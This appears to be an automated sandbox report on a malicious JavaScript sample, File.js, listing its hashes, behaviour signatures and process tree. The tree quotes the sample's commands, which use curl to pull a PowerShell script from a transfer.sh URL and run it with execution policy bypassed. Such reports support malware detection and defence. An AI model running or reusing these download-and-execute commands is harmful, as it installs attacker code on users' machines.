Analysis
- max time kernel: 45s
- max time network: 50s
- platform: windows7_x64
- resource: win7-20220901-en
- resource tags: arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
- submitted: 25-11-2022 18:01
Static task: static1
Behavioral task: behavioral1
  Sample: File.js
  Resource: win7-20220901-en
Behavioral task: behavioral2
  Sample: File.js
  Resource: win10v2004-20220901-en
General
- Target: File.js
- Size: 1024KB
- MD5: e6ec998371e8e87c4fd54fab0753efd6
- SHA1: 78ffb07d87bdc791efdf6621df9a69552dc12a84
- SHA256: 416293a2a049e175d85d418790035732eda8a055071d82d10f36a5bf6d9f246f
- SHA512: 1beb3ac230a17cf5a383660447368744d8ce183edbf5eba27d6b466031cdde96025ea32ad14d8ae6be3f0535a6537e41d3b4ff09fadd6f27aca14e8b94f79bbf
- SSDEEP: 24576:NFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFo:
Malware Config
Signatures
-
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses (1 IoCs)
Processes:
  pid   process
  1092  powershell.exe
-
Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes:
  description              pid   process
  Token: SeDebugPrivilege  1092  powershell.exe
-
Suspicious use of WriteProcessMemory (18 IoCs)
Processes:
  description                        pid   process      target process
  PID 1448 wrote to memory of 1932   1448  wscript.exe  wscript.exe
  PID 1448 wrote to memory of 1932   1448  wscript.exe  wscript.exe
  PID 1448 wrote to memory of 1932   1448  wscript.exe  wscript.exe
  PID 1932 wrote to memory of 1132   1932  wscript.exe  cmd.exe
  PID 1932 wrote to memory of 1132   1932  wscript.exe  cmd.exe
  PID 1932 wrote to memory of 1132   1932  wscript.exe  cmd.exe
  PID 1132 wrote to memory of 1152   1132  cmd.exe      cmd.exe
  PID 1132 wrote to memory of 1152   1132  cmd.exe      cmd.exe
  PID 1132 wrote to memory of 1152   1132  cmd.exe      cmd.exe
  PID 1932 wrote to memory of 668    1932  wscript.exe  cmd.exe
  PID 1932 wrote to memory of 668    1932  wscript.exe  cmd.exe
  PID 1932 wrote to memory of 668    1932  wscript.exe  cmd.exe
  PID 668 wrote to memory of 632     668   cmd.exe      cmd.exe
  PID 668 wrote to memory of 632     668   cmd.exe      cmd.exe
  PID 668 wrote to memory of 632     668   cmd.exe      cmd.exe
  PID 632 wrote to memory of 1092    632   cmd.exe      powershell.exe
  PID 632 wrote to memory of 1092    632   cmd.exe      powershell.exe
  PID 632 wrote to memory of 1092    632   cmd.exe      powershell.exe
Processes
- C:\Windows\system32\wscript.exe
  command: wscript.exe C:\Users\Admin\AppData\Local\Temp\File.js
  signatures: Suspicious use of WriteProcessMemory
  PID: 1448
  - C:\Windows\System32\wscript.exe
    command: "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\GTA01.vbs"
    signatures: Suspicious use of WriteProcessMemory
    PID: 1932
    - C:\Windows\System32\cmd.exe
      command: "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/KUz0uB/GTA.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
      signatures: Suspicious use of WriteProcessMemory
      PID: 1132
      - C:\Windows\system32\cmd.exe
        command: cmd.exe /c curl https://transfer.sh/get/KUz0uB/GTA.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
        PID: 1152
    - C:\Windows\System32\cmd.exe
      command: "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
      signatures: Suspicious use of WriteProcessMemory
      PID: 668
      - C:\Windows\system32\cmd.exe
        command: cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
        signatures: Suspicious use of WriteProcessMemory
        PID: 632
        - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command: powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
          signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
          PID: 1092
Network
MITRE ATT&CK Enterprise v6
Downloads
-
Filesize: 111KB
MD5: ae6f5f99b79da73f4a5946b99638464c
SHA1: 5dabcaf16267d88916091c8b969fab45e2780a2f
SHA256: 839956f6240fdb2afed0556347dd1ecd8c375cbf5e8c017073bc87383e41a77d
SHA512: 139210450bc7b580acb20a3f205ed15bb70ebc8779efbd5db31e8d77f8e37b396606d60ae87a8b8cce63e2a41666e54cec95d9a00f1959b96fa9047cb8624a8b